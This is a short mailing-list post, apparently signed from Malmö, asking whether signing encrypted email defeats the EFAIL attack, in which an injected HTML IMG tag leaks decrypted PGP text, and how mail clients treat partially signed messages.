I've been looking at a vulnerability in mail clients using pgp, described at efail.de. It is a technique where an attacker would inject a HTML IMG tag in an email, enveloping the encrypted text. This would send the cleartext message to the server inticated in the IMG tag.<br>
To me, it seems that this attack would be defeated by signing the encrypted message, which (to my knowledge) most email clients does by default.<br>
Am I missing something here? How do clients generally handle partially signed messages? Would they decrypt an encrypted message, if it would be enveloped in a cleartext IMG tag?<br>
Panina, malmö, sweden<br>
Sent from my Android device with K-9 Mail. Please excuse my brevity.